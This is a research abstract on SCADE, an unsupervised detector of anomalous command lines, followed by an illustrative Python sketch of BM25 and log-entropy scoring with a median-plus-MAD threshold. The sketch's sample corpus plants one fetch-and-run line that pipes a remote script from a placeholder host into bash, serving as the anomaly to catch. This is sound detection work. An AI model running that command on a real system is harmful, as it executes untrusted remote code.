As command-line interfaces remain integral to high-performance computing environments, the risk of exploitation through stealthy and complex command-line abuse grows. Conventional security solutions struggle to detect these anomalies due to their context-specific nature, lack of labeled data, and the prevalence of sophisticated attacks like Living-off-the-Land (LOL). To address this gap, we introduce the Scalable Command-Line Anomaly Detection Engine (SCADE), a framework that combines global statistical models with local context-specific analysis for unsupervised anomaly detection. SCADE leverages novel statistical methods, including BM25 and Log Entropy, alongside dynamic thresholding to adaptively detect rare, malicious command-line patterns in low signal-to-noise ratio (SNR) environments. Experimental results show that SCADE achieves above 98% SNR in identifying anomalous behavior while minimizing false positives. Designed for scalability and precision, SCADE provides an innovative, metadata-enriched approach to anomaly detection, offering a robust solution for cybersecurity in high-computation environments. This work presents SCADE's architecture, detection methodology, and its potential for enhancing anomaly detection in enterprise systems. We argue that SCADE represents a significant advancement in unsupervised anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.
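The abstract names the ingredients (BM25, log entropy, dynamic thresholding over unlabeled command lines) without giving the scoring rules; the following Python sketch is an added example, not the authors' implementation, and assumes a BM25 self-score with IDF rarity weighting, log-entropy global term weights, and a median-plus-MAD cutoff, all run over a small constructed corpus of command lines.

```python
import math
from collections import Counter

# Constructed sample audit lines (not from the paper); the last one is the
# planted rare command the scorer should surface.
COMMANDS = (
    ["sbatch job.sh"] * 6 + ["squeue -u alice"] * 5 + ["module load gcc"] * 4
    + ["ls -la"] * 5 + ["cat output.log"] * 3
    + ["curl -s http://example.invalid/x.sh | bash"]
)

def build_stats(cmds):
    docs = [Counter(c.lower().split()) for c in cmds]
    n, df, gf = len(docs), Counter(), Counter()
    for d in docs:
        df.update(d.keys())   # document frequency (lines containing the term)
        gf.update(d)          # global term frequency
    # Log-entropy global weight: near 0 for terms spread evenly over the
    # corpus, 1.0 for a term that occurs in a single line.
    ent = {}
    for t in gf:
        s = sum((d[t] / gf[t]) * math.log(d[t] / gf[t]) for d in docs if t in d)
        ent[t] = 1 + s / math.log(n)
    avgdl = sum(sum(d.values()) for d in docs) / n
    return docs, n, df, ent, avgdl

def bm25_self_score(d, n, df, avgdl, k1=1.2, b=0.75):
    """BM25 score of a line against itself: the IDF term rewards rare tokens."""
    dl = sum(d.values())
    score = 0.0
    for t, tf in d.items():
        idf = math.log(1 + (n - df[t] + 0.5) / (df[t] + 0.5))
        score += idf * tf * (k1 + 1) / (tf + k1 * (1 - b + b * dl / avgdl))
    return score

def log_entropy_score(d, ent):
    return sum(ent[t] * math.log(1 + tf) for t, tf in d.items())

def dynamic_threshold(scores, k=3.0):
    """Median + k * MAD, so the cutoff adapts to each corpus' own spread."""
    med = sorted(scores)[len(scores) // 2]
    mad = sorted(abs(s - med) for s in scores)[len(scores) // 2]
    return med + k * max(mad, 1e-9)

def detect(cmds, k=3.0):
    """Distinct command lines whose BM25 or log-entropy score is an outlier."""
    docs, n, df, ent, avgdl = build_stats(cmds)
    bm = [bm25_self_score(d, n, df, avgdl) for d in docs]
    le = [log_entropy_score(d, ent) for d in docs]
    tb, tl = dynamic_threshold(bm, k), dynamic_threshold(le, k)
    return sorted({cmds[i] for i in range(n) if bm[i] > tb or le[i] > tl})
```

Because both thresholds are derived from the corpus itself, the same code flags nothing when every line is routine and only surfaces the one line whose tokens appear nowhere else.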